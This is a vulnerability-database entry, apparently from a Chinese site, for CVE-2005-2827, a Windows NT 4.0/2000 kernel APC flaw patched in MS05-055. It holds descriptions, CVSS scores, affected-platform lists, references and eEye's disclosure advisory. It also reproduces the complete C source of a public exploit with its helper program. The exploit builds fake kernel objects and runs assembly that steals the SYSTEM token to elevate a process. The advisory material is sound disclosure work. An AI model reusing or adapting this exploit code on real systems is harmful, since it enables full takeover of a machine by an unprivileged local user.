CVE-2005-2827
CVSS7.2
发布时间 :2005-12-13 20:03:00
修订时间 :2011-03-07 21:25:05
NMCOEPS    

[原文]The thread termination routine in the kernel for Windows NT 4.0 and 2000 (NTOSKRNL.EXE) allows local users to modify kernel memory and execution flow via steps in which a terminating thread causes Asynchronous Procedure Call (APC) entries to free the wrong data, aka the "Windows Kernel Vulnerability."


[CNNVD]Microsoft Windows异步过程调用本地权限提升漏洞(CNNVD-200512-225)

        Microsoft Windows是微软发布的非常流行的操作系统。
        Microsoft Windows处理异步过程调用(APC)队列列表的方式存在漏洞,本地攻击者可以利用此漏洞提供任意函数指针,劫持执行流,最终完全控制系统。线程在退出的时候,PspExitThread会从ETHREAD.ApcState.ApcListHead[0]和ApcListHead[1]分离线程的APC队列,这样每个队列都会是一个循环的、双向链接的列表,其第一个和最后一个节点不指回到表头(LIST_ENTRY结构)。但是,由于没有修改表头的指针,因此其目的可能仅仅是允许PspExitThread中的APC释放循环,以便无需回到表头并错误的尝试释放ETHREAD结构中内存便可走过每个列表并释放其节点。攻击者可以利用这一过程释放数据,最终导致ExFreePoolWithTag操作用户内存。
        外部进程所排列的APC会计算该进程的pool限额,因此包含有APC结构pool块的限额块会引用队列进程。如果正在退出线程的列表中包含有当前终止外部进程所排列的APC,且该APC节点代表进程的Process对象的最后引用,则释放该节点会导致在ExFreePoolWithTag中破坏Process对象,所造成的后果包括执行PspProcessDelete。这会使用KeStackAttachProcess切换到结束进程的地址空间,调用PspExitProcess。然后使用KeUnstackDetachProcess反转切换。
        "attach"和"detach"函数都调用KiMoveApcState,其目的是临时分离其APC的线程,这样就不会分发到非预期的地址空间中,然后在线程的原始地址空间恢复后重新链接APC列表。在附加过程中,复制了ETHREAD.ApcState结构,并调整了列表的第一个和最后一个节点的指针以便引用拷贝。在分离的时候,尽管假设第一个和最后一个节点的指针仍是断开的(因为APC释放循环仍在进行),但调整了这些节点指针以重新将列表链接到原始的ETHREAD.ApcState。最终结果是释放循环仍会继续,尝试释放部分ETHREAD结构。由于所访问的ETHREAD部分中包含有可预测的且大部分为清零的值,因此最终会导致对攻击者提供指针的kernel操作。
        以下过程说明了函数调用顺序和漏洞产生过程中所涉及到的参数:
        . PspExitThread
        . . KeFlushQueueApc
        . . (detaches APC queues from ETHREAD.ApcState.ApcListHead)
        . . (APC free loop begins)
        . . ExFreePool(1st_APC -- queued by exited_process)
        . . . ExFreePoolWithTag(1st_APC)
        . . . . ObfDereferenceObject(exited_process)
        . . . . . ObpRemoveObjectRoutine
        . . . . . . PspProcessDelete
        . . . . . . . KeStackAttachProcess(exited_process)
        . . . . . . . . KiAttachProcess
        . . . . . . . . . KiMoveApcState(ETHREAD.ApcState --> duplicate)
        . . . . . . . . . KiSwapProcess
        . . . . . . . PspExitProcess(0)
        . . . . . . . KeUnstackDetachProcess
        . . . . . . . . KiMoveApcState(duplicate --> ETHREAD.ApcState)
        . . . . . . . . KiSwapProcess
        . . ExFreePool(2nd_APC)
        . . ExFreePool(ETHREAD + 30h)
        . . (APC free loop ends)

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_2000::sp1:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp3:professionalMicrosoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp3:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP3
cpe:/o:microsoft:windows_2000::sp3:advanced_serverMicrosoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_2000::sp2:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_2000::sp4:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP4
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000::sp4:serverMicrosoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_nt:4.0Microsoft Windows NT 4.0
cpe:/o:microsoft:windows_2000::sp4:professionalMicrosoft Windows 2000 Professional SP4
cpe:/o:microsoft:windows_2000::sp4:advanced_serverMicrosoft Windows 2000 Advanced Server SP4

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1583Win2K Kernel Privilege Escalation Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2827
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2827
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-225
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/15826
(PATCH)  BID  15826
http://www.microsoft.com/technet/security/bulletin/ms05-055.mspx
(VENDOR_ADVISORY)  MS  MS05-055
http://secunia.com/advisories/15821
(VENDOR_ADVISORY)  SECUNIA  15821
http://xforce.iss.net/xforce/xfdb/23447
(UNKNOWN)  XF  win-apc-gain-privileges(23447)
http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375420
(UNKNOWN)  MISC  http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375420
http://www.vupen.com/english/advisories/2005/2909
(UNKNOWN)  VUPEN  ADV-2005-2909
http://www.vupen.com/english/advisories/2005/2868
(UNKNOWN)  VUPEN  ADV-2005-2868
http://www.securityfocus.com/archive/1/archive/1/419377/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051213 [EEYEB-20050523] Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability
http://www.osvdb.org/18823
(UNKNOWN)  OSVDB  18823
http://www.eeye.com/html/research/advisories/AD20051213.html
(UNKNOWN)  EEYE  EEYEB-20051213
http://support.avaya.com/elmodocs2/security/ASA-2005-234.pdf
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2005-234.pdf
http://securitytracker.com/id?1015347
(UNKNOWN)  SECTRACK  1015347
http://secunia.com/advisories/18311
(UNKNOWN)  SECUNIA  18311
http://secunia.com/advisories/18064
(UNKNOWN)  SECUNIA  18064
http://securityreason.com/securityalert/252
(UNKNOWN)  SREASON  252

- 漏洞信息

Microsoft Windows异步过程调用本地权限提升漏洞
高危 设计错误
2005-12-13 00:00:00 2007-04-10 00:00:00
本地  
        Microsoft Windows是微软发布的非常流行的操作系统。
        Microsoft Windows处理异步过程调用(APC)队列列表的方式存在漏洞,本地攻击者可以利用此漏洞提供任意函数指针,劫持执行流,最终完全控制系统。线程在退出的时候,PspExitThread会从ETHREAD.ApcState.ApcListHead[0]和ApcListHead[1]分离线程的APC队列,这样每个队列都会是一个循环的、双向链接的列表,其第一个和最后一个节点不指回到表头(LIST_ENTRY结构)。但是,由于没有修改表头的指针,因此其目的可能仅仅是允许PspExitThread中的APC释放循环,以便无需回到表头并错误的尝试释放ETHREAD结构中内存便可走过每个列表并释放其节点。攻击者可以利用这一过程释放数据,最终导致ExFreePoolWithTag操作用户内存。
        外部进程所排列的APC会计算该进程的pool限额,因此包含有APC结构pool块的限额块会引用队列进程。如果正在退出线程的列表中包含有当前终止外部进程所排列的APC,且该APC节点代表进程的Process对象的最后引用,则释放该节点会导致在ExFreePoolWithTag中破坏Process对象,所造成的后果包括执行PspProcessDelete。这会使用KeStackAttachProcess切换到结束进程的地址空间,调用PspExitProcess。然后使用KeUnstackDetachProcess反转切换。
        "attach"和"detach"函数都调用KiMoveApcState,其目的是临时分离其APC的线程,这样就不会分发到非预期的地址空间中,然后在线程的原始地址空间恢复后重新链接APC列表。在附加过程中,复制了ETHREAD.ApcState结构,并调整了列表的第一个和最后一个节点的指针以便引用拷贝。在分离的时候,尽管假设第一个和最后一个节点的指针仍是断开的(因为APC释放循环仍在进行),但调整了这些节点指针以重新将列表链接到原始的ETHREAD.ApcState。最终结果是释放循环仍会继续,尝试释放部分ETHREAD结构。由于所访问的ETHREAD部分中包含有可预测的且大部分为清零的值,因此最终会导致对攻击者提供指针的kernel操作。
        以下过程说明了函数调用顺序和漏洞产生过程中所涉及到的参数:
        . PspExitThread
        . . KeFlushQueueApc
        . . (detaches APC queues from ETHREAD.ApcState.ApcListHead)
        . . (APC free loop begins)
        . . ExFreePool(1st_APC -- queued by exited_process)
        . . . ExFreePoolWithTag(1st_APC)
        . . . . ObfDereferenceObject(exited_process)
        . . . . . ObpRemoveObjectRoutine
        . . . . . . PspProcessDelete
        . . . . . . . KeStackAttachProcess(exited_process)
        . . . . . . . . KiAttachProcess
        . . . . . . . . . KiMoveApcState(ETHREAD.ApcState --> duplicate)
        . . . . . . . . . KiSwapProcess
        . . . . . . . PspExitProcess(0)
        . . . . . . . KeUnstackDetachProcess
        . . . . . . . . KiMoveApcState(duplicate --> ETHREAD.ApcState)
        . . . . . . . . KiSwapProcess
        . . ExFreePool(2nd_APC)
        . . ExFreePool(ETHREAD + 30h)
        . . (APC free loop ends)

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.microsoft.com/technet/security/bulletin/ms05-055.mspx
        http://www.microsoft.com/downloads/details.aspx?FamilyId=3832FF23-6B04-4CA2-80B9-D344B4CC98EA

- 漏洞信息 (1407)

MS Windows 2k Kernel APC Data-Free Local Escalation Exploit (MS05-055) (EDBID:1407)
windows local
2006-01-05 Verified
0 SoBeIt
N/A [点击下载]
/* helper.c commented out below ms05-055.c /str0ke */

/*
	MS05-055 Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability Exploit
			Created by SoBeIt
					12.25.2005

	Main file of exploit

	Tested on:

	Windows 2000 PRO SP4 Chinese
	Windows 2000 PRO SP4 Rollup 1 Chinese
	Windows 2000 PRO SP4 English
	Windows 2000 PRO SP4 Rollup 1 English

	Usage:ms05-055.exe helper.exe
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>


#define NTSTATUS	ULONG
#define ProcessBasicInformation	0

typedef VOID (NTAPI *PKNORMAL_ROUTINE)(PVOID ApcContext, PVOID Argument1, PVOID Argument2);

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _PROCESS_BASIC_INFORMATION {
      NTSTATUS ExitStatus;
      PVOID PebBaseAddress;
      ULONG AffinityMask;
      ULONG BasePriority;
      ULONG UniqueProcessId;
      ULONG InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;

typedef struct _EPROCESS_QUOTA_BLOCK {
    ULONG QuotaLock;
    ULONG ReferenceCount;
    ULONG QuotaPeakPoolUsage[2];
    ULONG QuotaPoolUsage[2];
    ULONG QuotaPoolLimit[2];
    ULONG PeakPagefileUsage;
    ULONG PagefileUsage;
    ULONG PagefileLimit;
} EPROCESS_QUOTA_BLOCK, *PEPROCESS_QUOTA_BLOCK;

typedef struct _OBJECT_TYPE_INITIALIZER {
    USHORT Length;
    BOOLEAN UseDefaultObject;
    BOOLEAN Reserved;
    ULONG InvalidAttributes;
    UCHAR GenericMapping[0x10];
    ULONG ValidAccessMask;
    BOOLEAN SecurityRequired;
    BOOLEAN MaintainHandleCount;
    BOOLEAN MaintainTypeList;
    USHORT PoolType;
    ULONG DefaultPagedPoolCharge;
    ULONG DefaultNonPagedPoolCharge;
    PVOID DumpProcedure;
    PVOID OpenProcedure;
    PVOID CloseProcedure;
    PVOID DeleteProcedure;
    PVOID ParseProcedure;
    PVOID SecurityProcedure;
    PVOID QueryNameProcedure;
    PVOID OkayToCloseProcedure;
} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER;

typedef struct _OBJECT_TYPE {
    UCHAR Mutex[0x38];
    LIST_ENTRY TypeList;
    UNICODE_STRING Name;
    PVOID DefaultObject;
    ULONG Index;
    ULONG TotalNumberOfObjects;
    ULONG TotalNumberOfHandles;
    ULONG HighWaterNumberOfObjects;
    ULONG HighWaterNumberOfHandles;
    OBJECT_TYPE_INITIALIZER TypeInfo;
} OBJECT_TYPE, *POBJECT_TYPE;

typedef struct _OBJECT_HEADER {
    ULONG PointerCount;
    ULONG HandleCount;
    POBJECT_TYPE Type;
    UCHAR NameInfoOffset;
    UCHAR HandleInfoOffset;
    UCHAR QuotaInfoOffset;
    UCHAR Flags;
    PVOID QuotaBlockCharged;
    PVOID SecurityDescriptor;
} OBJECT_HEADER, *POBJECT_HEADER;

__declspec(naked)
NTSTATUS
NTAPI
ZwQueueApcThread(
	HANDLE hThread,
	PKNORMAL_ROUTINE ApcRoutine,
	PVOID ApcContext,
	PVOID Argument1,
	PVOID Argument2)
{
	__asm
	{
		mov eax, 0x9e
		lea edx, [esp+4]
		int 0x2e
		ret 0x14
	}
}

__declspec(naked)
NTSTATUS
ZwAlertThread(
	HANDLE hThread)
{
	__asm
	{
		mov eax, 0x0c
		lea edx, [esp+4]
		int 0x2e
		ret 0x4
	}
}

__declspec(naked)
NTSTATUS
NTAPI
ZwQueryInformationProcess(
	HANDLE ProcessHandle,
	ULONG InformationClass,
	PVOID ProcessInformation,
	ULONG ProcessInformationLength,
	PULONG ReturnLength)
{
	__asm
	{
		mov eax, 0x86
		lea edx, [esp+4]
		int 0x2e
		ret 0x14
	}
}

HANDLE	hTargetThread;
ULONG	ParentProcessId;

VOID NTAPI APCProc(PVOID pApcContext, PVOID Argument1, PVOID Argument2)
{
    printf("%s\n", pApcContext);

	return;
}

VOID ErrorQuit(char *msg)
{
	printf(msg);
	ExitProcess(0);
}

ULONG WINAPI TestThread(PVOID pParam)
{
	CONTEXT	Context;
	ULONG	i = 0;
	HANDLE	hThread, hEvent = (HANDLE)pParam;
	int	PoolIndex, PoolType;

	for(;;)
	{
		if((hThread = CreateThread(NULL, 0, TestThread, pParam, CREATE_SUSPENDED, NULL)) == NULL)
			ErrorQuit("Create thread failed.\n");

		Context.ContextFlags = CONTEXT_INTEGER;
		if(!GetThreadContext(GetCurrentThread(), &Context))
			ErrorQuit("Child thread get context failed.\n");

		printf("Child ESP:%x\n", Context.Esp);
		PoolType = (Context.Esp >> 16) & 0xff;
		PoolIndex = ((Context.Esp >> 8) & 0xff) - 1;
		printf("PoolIndex:%2x PoolType:%2x\n", PoolIndex, PoolType);
		if((PoolIndex & 0x80) && (PoolType & 0x8) && (PoolType & 0x3) && !(PoolType & 0x20) && !(PoolType & 0x40))
		{
			printf("Perfect ESP:%x\n", Context.Esp);
			break;
		}

		Sleep(500);
		ResumeThread(hThread);
		CloseHandle(hThread);
		SuspendThread(GetCurrentThread());
	}

	DuplicateHandle(GetCurrentProcess(), GetCurrentThread(), GetCurrentProcess(), &hTargetThread, 0, FALSE, DUPLICATE_SAME_ACCESS);
	SetEvent(hEvent);
	SuspendThread(hTargetThread);
	ZwQueueApcThread(hTargetThread, APCProc, NULL, NULL, NULL);
	printf("In child thread. Now terminating to trigger the bug.\n");
	ExitThread(0);

	return 1;
}

__declspec(naked) ExploitFunc()
{
	__asm
	{
//		int	0x3
		mov esi, 0xffdff124
		mov esi, dword ptr [esi]
		mov eax, dword ptr [esi+0x44]

		mov ecx, 0x8
		call FindProcess
		mov edx, eax

		mov ecx, ParentProcessId
		call FindProcess

		mov ecx, dword ptr [edx+0x12c]
		mov dword ptr [eax+0x12c], ecx
		xor ebx, ebx
		xor edi, edi
		mov dword ptr [ebp+0xf0], edi
		add esp, 0x74
		add ebp, 0x10c
		ret

FindProcess:
	    mov eax, dword ptr [eax+0xa0]
		sub eax, 0xa0
		cmp dword ptr [eax+0x9c], ecx
		jne FindProcess
		ret
	}
}

int main(int argc, char *argv[])
{
	HANDLE	hThread, hEvent, hProcess;
	PEPROCESS_QUOTA_BLOCK	pEprocessQuotaBlock;
	POBJECT_HEADER	pObjectHeader;
	POBJECT_TYPE	pObjectType;
	ULONG	i = 0, ProcessId;
	STARTUPINFO si;
    PROCESS_INFORMATION pi;
	PROCESS_BASIC_INFORMATION pbi;
	char Buf[64], *pParam;
	PULONG	pKernelData;

	printf("\n MS05-055 Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability Exploit \n\n");
	printf("\t Create by SoBeIt. \n\n");
	if(argc != 2)
	{
		printf(" Usage:ms05-055.exe helper.exe. \n\n");
		return 1;
	}

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
	
	if((pKernelData = VirtualAlloc((PVOID)0x1000000, 0x1000, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
		ErrorQuit("Allocate pKernelData failed.\n");

	if((pEprocessQuotaBlock = VirtualAlloc(NULL, sizeof(EPROCESS_QUOTA_BLOCK), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)) == NULL)
		ErrorQuit("Allocate pEprocessQuotaBlock failed.\n");

	if((pObjectHeader = VirtualAlloc(NULL, sizeof(OBJECT_HEADER), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)) == NULL)
		ErrorQuit("Allocate pObjectHeader failed\n");

	if((pObjectType = VirtualAlloc(NULL, sizeof(OBJECT_TYPE), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)) == NULL)
		ErrorQuit("Allocate pObjectType failed.\n");

	ZeroMemory((PVOID)0x1000000, 0x1000);
	ZeroMemory(pEprocessQuotaBlock, sizeof(EPROCESS_QUOTA_BLOCK));
	ZeroMemory(pObjectHeader, sizeof(OBJECT_HEADER));
	ZeroMemory(pObjectType, sizeof(OBJECT_TYPE));

	pKernelData[0xee] = (ULONG)pEprocessQuotaBlock;		//0xae = (0x1b8+0x200) / 4
	pEprocessQuotaBlock->ReferenceCount = 0x221;
	pEprocessQuotaBlock->QuotaPeakPoolUsage[0] = 0x1f4e4;
	pEprocessQuotaBlock->QuotaPeakPoolUsage[1] = 0x78134;
	pEprocessQuotaBlock->QuotaPoolUsage[0] = 0x1e5e8;
	pEprocessQuotaBlock->QuotaPoolUsage[1] = 0x73f64;
	pEprocessQuotaBlock->QuotaPoolLimit[0] = 0x20000;
	pEprocessQuotaBlock->QuotaPoolLimit[1] = 0x80000;
	pEprocessQuotaBlock->PeakPagefileUsage = 0x5e9;
	pEprocessQuotaBlock->PagefileUsage = 0x5bb;
	pEprocessQuotaBlock->PagefileLimit = 0xffffffff;

	pObjectHeader = (POBJECT_HEADER)(0x1000200-0x18);
	pObjectHeader->PointerCount = 1;
	pObjectHeader->Type = pObjectType;

	pObjectType->TypeInfo.DeleteProcedure = ExploitFunc;

	hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
	DuplicateHandle(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(), 
			&hProcess, 0, FALSE, DUPLICATE_SAME_ACCESS);

	if((hThread = CreateThread(NULL, 0, TestThread, (PVOID)hEvent, CREATE_SUSPENDED, NULL)) == NULL)
		ErrorQuit("Create thread failed.\n");
	
	ResumeThread(hThread);
	WaitForSingleObject(hEvent, INFINITE);
	printf("The sleep has awaken.\n");
	ProcessId = GetCurrentProcessId();
	printf("Target thread handle:%x, Target process handle:%x, Process id:%x\n", hTargetThread, hProcess, ProcessId);
	pParam = Buf;
	strcpy(Buf, argv[1]);
	pParam += sizeof(argv[1]);
	pParam = strchr(Buf, '\0');
	*pParam++ = ' ';
	itoa((int)hTargetThread, pParam, 10);
	pParam = strchr(Buf, '\0');
	*pParam++ = ' ';
	itoa(ProcessId, pParam, 10);
	printf("%s\n", Buf);
	if(!CreateProcess(NULL, Buf, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi ))
		ErrorQuit("Create process failed,\n");

	CloseHandle(pi.hThread);
	CloseHandle(hEvent);
	printf("Now waitting for triggering the bug.\n");
	WaitForSingleObject(pi.hProcess, INFINITE);
	if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
		ErrorQuit("Query parent process failed\n");

	ParentProcessId = pbi.InheritedFromUniqueProcessId;
	printf("Parent process id:%x\n", ParentProcessId);
	
	CloseHandle(pi.hProcess);
	ResumeThread(hTargetThread);
	WaitForSingleObject(hTargetThread, INFINITE);
	printf("Exploit finished.\n");

	return 1;
}


/*
	MS05-055 Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability Exploit
			Created by SoBeIt
					12.25.2005

	Helper file of exploit

	Tested on:

	Windows 2000 PRO SP4 Chinese
	Windows 2000 PRO SP4 Rollup 1 Chinese
	Windows 2000 PRO SP4 English
	Windows 2000 PRO SP4 Rollup 1 English

	Usage:ms05-055.exe helper.exe


#include <stdio.h>
#include <windows.h>

#define NTSTATUS	ULONG

typedef VOID (NTAPI *PKNORMAL_ROUTINE)(PVOID ApcContext, PVOID Argument1, PVOID Argument2);

__declspec(naked)
NTSTATUS
NTAPI
ZwQueueApcThread(
	HANDLE hThread,
	PKNORMAL_ROUTINE ApcRoutine,
	PVOID ApcContext,
	PVOID Argument1,
	PVOID Argument2)
{
	__asm
	{
		mov eax, 0x9e
		lea edx, [esp+4]
		int 0x2e
		ret 0x14
	}
}

__declspec(naked)
NTSTATUS
ZwAlertThread(
	HANDLE hThread)
{
	__asm
	{
		mov eax, 0x0c
		lea edx, [esp+4]
		int 0x2e
		ret 0x4
	}
}

VOID NTAPI ApcProc(PVOID ApcContext, PVOID Argument1, PVOID Argument2)
{
}

int main(int argc, char *argv[])
{
	HANDLE	hTargetThread, hTargetProcess, hThread;
	int		ProcessId;
	PVOID	pApcProc;

	if(argc != 3)
	{
		printf(" Usage:ms05-055.exe helper.exe. \n");
		return 1;
	}

	hTargetThread = (HANDLE)atoi(argv[1]);
	ProcessId = atoi(argv[2]);
	printf("Got thread handle:%x, Got process id:%x\n", hTargetThread, ProcessId);
	hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
	printf("Process handle:%x\n", hTargetProcess);
	if(!DuplicateHandle(hTargetProcess, hTargetThread, GetCurrentProcess(),  &hThread, 0, FALSE, DUPLICATE_SAME_ACCESS))
		printf("Duplicate handle failed.\n");

	if((pApcProc = VirtualAllocEx(hTargetProcess, 0, 1024*4, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
		printf("Allocate remote memory failed.\n");

	if(!WriteProcessMemory(hTargetProcess, pApcProc, &ApcProc, 1024*4, 0))
		printf("Write remote memory failed.\n");

	ZwAlertThread(hThread);
	ZwQueueApcThread(hThread, (PKNORMAL_ROUTINE)pApcProc, NULL, NULL, NULL);
	CloseHandle(hTargetProcess);
	CloseHandle(hThread);
	printf("Now terminating process.\n");
	ExitProcess(0);
}

*/

// milw0rm.com [2006-01-05]
		

- 漏洞信息 (F42288)

EEYEB-20050523.txt (PacketStormID:F42288)
2005-12-14 00:00:00
Derek Soeder  eeye.com
advisory,kernel,local
windows,2k,nt
CVE-2005-2827
[点击下载]

eEye Security Advisory - eEye Digital Security has discovered a local privilege escalation vulnerability in the Windows kernel that could allow any code executing on a Windows NT 4.0 or Windows 2000 system to elevate itself to the highest possible local privilege level (kernel).

Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability

Release Date:
December 13, 2005

Date Reported:
May 23, 2005

External Refferences:
eEye ID# EEYEB-20050523
OSVDB ID# 18823
CVE # CAN-2005-2827
Microsoft #  MS05-055

Severity:
Medium (Local Privilege Escalation to Kernel)

Systems Affected:
Windows NT 4.0
Windows 2000

Overview:
eEye Digital Security has discovered a local privilege escalation
vulnerability in the Windows kernel that could allow any code executing
on a Windows NT 4.0 or Windows 2000 system to elevate itself to the
highest possible local privilege level (kernel).  For example, a
malicious user, network worm, or e-mail virus could take advantage of
this vulnerability in order to completely compromise the vulnerable
system on which the exploit code is executing, regardless of that code's
original privilege level.

The vulnerability exists in the thread termination routine contained
within NTOSKRNL.EXE.  Through a specific series of steps, a local
attacker can cause the code responsible for discarding queued
Asynchronous Procedure Call (APC) entries to erroneously attempt to free
a region of kernel data, producing a "data free" vulnerability that may
be exploited in order to alter arbitrary kernel memory, or even divert
the flow of execution directly.

Technical Details:
The basis of this vulnerability is in PspExitThread's APC freeing loop
and in the behavior of KiMoveApcState, invoked from KiAttachProcess and
KeUnstackDetachProcess.  We'll give a description of the problem below,
followed by a "call flow" illustration to outline the specific sequence
of events.

When a thread is exiting, PspExitThread will detach the thread's APC
queues from ETHREAD.ApcState.ApcListHead[0] and ApcListHead[1], so that
each queue is now a circular, doubly-linked list in which the first and
last nodes do not point back to the list head (LIST_ENTRY structure).
However, since the list heads' pointers are not modified, the purpose is
presumably just to allow the APC freeing loop within PspExitThread to
walk each list and free its nodes, without navigating back to the list
head and erroneously attempting to free memory within the ETHREAD
structure.  Of course, the vulnerability is that this can be made to
happen, and the result is a "data free" condition that eventually causes
ExFreePoolWithTag to operate on user memory.

APCs queued by an external process count against that process's pool
quota, and therefore the quota block of the pool block containing the
APC structure has a reference to the queuing process.  If the exiting
thread contains an APC queued by a now-terminated external process in
its lists, and if that APC node represents the last reference to the
process's Process object, then freeing that node will cause the Process
object to be destroyed from within ExFreePoolWithTag.  Part of this
sequence involves executing PspProcessDelete, which switches to the
ending process's address space using KeStackAttachProcess, calls
PspExitProcess, and then reverses the switch with
KeUnstackDetachProcess.

Both the "attach" and "detach" functions call KiMoveApcState, which is
intended to temporarily strip the thread of its APCs so that none are
dispatched in an address space for which they were not intended, then
re-link the list of APCs after the thread's native address space is
reinstated.  During attach, the ETHREAD.ApcState structure is
duplicated, and the pointers of the lists' first and last nodes are
adjusted to refer to the copy.  Upon detach, the first and last nodes'
pointers are adjusted to re-link the lists to the original
ETHREAD.ApcState -- even though they were supposed to remain
disconnected, since the APC free loop is still in progress.  The end
result is that the free loop will continue and attempt to free a portion
of the ETHREAD structure as though it were a pool block header,
culminating in the kernel operating on attacker-supplied pointers from
user-land memory, because the accessed portion of ETHREAD contains
predictable and mostly zeroed values.

The following depicts the sequence of function calls and parameters
involved in producing the vulnerable condition:

. PspExitThread
. . KeFlushQueueApc
. . (detaches APC queues from ETHREAD.ApcState.ApcListHead)
. . (APC free loop begins)
. . ExFreePool(1st_APC -- queued by exited_process)
. . . ExFreePoolWithTag(1st_APC)
. . . . ObfDereferenceObject(exited_process)
. . . . . ObpRemoveObjectRoutine
. . . . . . PspProcessDelete
. . . . . . . KeStackAttachProcess(exited_process)
. . . . . . . . KiAttachProcess
. . . . . . . . . KiMoveApcState(ETHREAD.ApcState --> duplicate)
. . . . . . . . . KiSwapProcess
. . . . . . . PspExitProcess(0)
. . . . . . . KeUnstackDetachProcess
. . . . . . . . KiMoveApcState(duplicate --> ETHREAD.ApcState)
. . . . . . . . KiSwapProcess
. . ExFreePool(2nd_APC)
. . ExFreePool(ETHREAD + 30h)
. . (APC free loop ends)

The ETHREAD data upon which ExFreePool is called is mostly predictable,
KernelStack at offset +28h being the single true variable; however,
methods for leaking a thread's kernel ESP permit complete control over
the path execution will take through ExFreePoolWithTag.  With enough
crafting, an arbitrary function pointer can be supplied as an object
type method, allowing execution to be hijacked directly.

Beginning with Windows XP, KeFlushQueueApc contains a code fix that
resolves this vulnerability.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.

Vendor Status:
Microsoft has released a patch for this vulnerability.  The patch is
available at:
http://www.microsoft.com/technet/security/bulletin/MS05-055.mspx

Credit:
Derek Soeder

Greetings:
Dedicated to

R. W. S., Sr.
1928 - 2005

>>From my father to his:

"He was a good man; liked by all, loved by many.  He was always upbeat,
outgoing and loved to kid around.  He was always willing to help others
in their time of need and gave a lot of himself.  He was very creative,
handy with tools, and could fix about anything.  He was the one everyone
turned to for advice and direction.  He was my father, and I miss him
dearly."

Copyright (c) 1998-2005 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically.  It is not to be edited in any way without express
consent of eEye.  If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice.  Use of
this information constitutes acceptance for use in an AS IS condition.
There are no warranties, implied or express, with regard to this
information.  In no event shall the author be liable for any direct or
indirect damages whatsoever arising out of or in connection with the use
or spread of this information.  Any use of this information is at the
user's own risk.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息

18823
Microsoft Windows Kernel APC Queue Manipulation Local Privilege Escalation
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2005-12-13 Unknow
Unknow 2005-12-13

